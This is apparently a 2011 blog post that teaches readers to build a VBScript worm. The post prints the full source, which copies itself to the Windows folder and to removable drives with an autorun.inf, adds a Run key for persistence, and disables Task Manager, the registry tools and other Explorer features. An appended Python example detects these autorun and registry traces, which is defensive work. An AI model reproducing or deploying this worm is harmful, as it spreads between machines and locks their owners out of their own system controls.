Every virus has its own characteristics, and these can be told apart by the way it attacks or by its file extension. This time I will discuss a virus with the VBS extension, which uses Windows Script Host. The script can be created with a simple application, namely Notepad. Here is how it is made:
1. Open Notepad
2. Copy and paste the following script:
------------------------------Script------------------------------
on error resume next
dim rekur,windowpath,flashdrive,fs,mf,isi,tf,Hx,nt,check,sd
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe k4l0n6.dll.vbs” set fs = createobject(”Scripting.FileSystemObject”) set mf = fs.getfile(Wscript.ScriptFullname) dim text,size size = mf.size check = mf.drive.drivetype set text = mf.openastextstream(1,-2) do while not text.atendofstream rekur = rekur & text.readline rekur = rekur & vbcrlf loop do
Set windowpath = fs.getspecialfolder(0) set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “) tf.attributes = 32 set tf=fs.createtextfile(windowpath & “\batch- k4l0n6.dll.vbs”,2,true) tf.write rekursif tf.close set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “) tf.attributes = 39
for each flashdrive in fs.drives If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then
set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “) tf.attributes =32 set tf=fs.createtextfile(flashdrive.path &”\k4l0n6.dll.vbs “,2,true) tf.write rekursif tf.close set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “) tf.attributes = 39
set tf =fs.getfile(flashdrive.path &”\autorun.inf”) tf.attributes = 32 set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true) tf.write isi tf.close set tf = fs.getfile(flashdrive.path &”\autorun.inf”) tf.attributes=39 end if next
set Hx = createobject(”WScript.Shell”)
Hx.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,” HxHacker “
Hx.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”, “0″, “REG_DWORD”
Hx.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD” Hx.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD” Hx.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD” Hx.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD” Hx.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”
Hx.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”
Hx.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “Worm Hx . your computer now is hacked by zeke hack.”
Hx.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”, windowpath & “\batch- k4l0n6.dll.vbs “
Hx.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “The Batrix” Hx.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”,”Hx ”
if check <> 1 then Wscript.sleep 200000 end if loop while check <> 1 set sd = createobject(”Wscript.shell”) sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
---------------------------end of script---------------------------
3. Save as, change "save as type" to "all files", and save it with the ".vbs" extension, for example Hx.vbs.
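For defenders, the traces this script is written to leave can be checked for: an autorun.inf that launches wscript.exe, policy values set to 1 under the Policies keys, and a Run entry pointing at a .vbs file. The Python below is an added example, not part of the original post; it assumes the autorun.inf and a `reg export` dump have already been read and decoded to text, and the function names and sample data are constructed for illustration.

```python
import re

# Policy value names the script on this page sets to 1 (names taken from the page).
POLICY_VALUES = {"NoFind", "NoFolderOptions", "NoRun", "NoViewContextMenu",
                 "DisableRegistryTools", "DisableTaskMgr"}
SCRIPT_HOSTS = ("wscript", "cscript")
SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".jse", ".wsf")

def check_autorun(text):
    """Return autorun.inf launch lines that start a script host or a script file."""
    hits, in_section = [], False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("["):
            in_section = line.lower() == "[autorun]"
            continue
        key, sep, value = line.partition("=")
        if in_section and sep and key.strip().lower() in ("open", "shellexecute"):
            v = value.strip().lower()
            if any(h in v for h in SCRIPT_HOSTS) or v.endswith(SCRIPT_EXTS):
                hits.append(line)
    return hits

def check_reg_export(text):
    """Return (key, value name, data) findings from decoded .reg-format text."""
    findings, key = [], ""
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            continue
        m = re.match(r'"([^"]+)"=(.*)$', line)
        name, data = m.groups() if m else ("", "")
        policy = ("\\policies\\" in key.lower() and name in POLICY_VALUES
                  and data.lower() == "dword:00000001")
        run_script = (key.lower().endswith("\\currentversion\\run")
                      and data.strip('" ').lower().endswith(SCRIPT_EXTS))
        if policy or run_script:
            findings.append((key, name, data))
    return findings

# Constructed samples (not captured from a real machine); file name is the page's.
SAMPLE_AUTORUN = "[autorun]\nshellexecute=wscript.exe k4l0n6.dll.vbs\n"
SAMPLE_REG = r'''Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:00000001
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"Systemdir"="C:\\WINDOWS\\batch- k4l0n6.dll.vbs"
"Benign"="C:\\Program Files\\Example\\tray.exe"
'''
```

A Run entry that ends in a script extension is not always malicious, so treat findings as items to review alongside the policy values rather than as a verdict.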
Friday, 30 September 2011
Creating a VBS Virus II
__________________________________________________________________
1 comment:
Bro, if this is opened, can it make the whole computer error out?
If it's only saved, that's fine, right?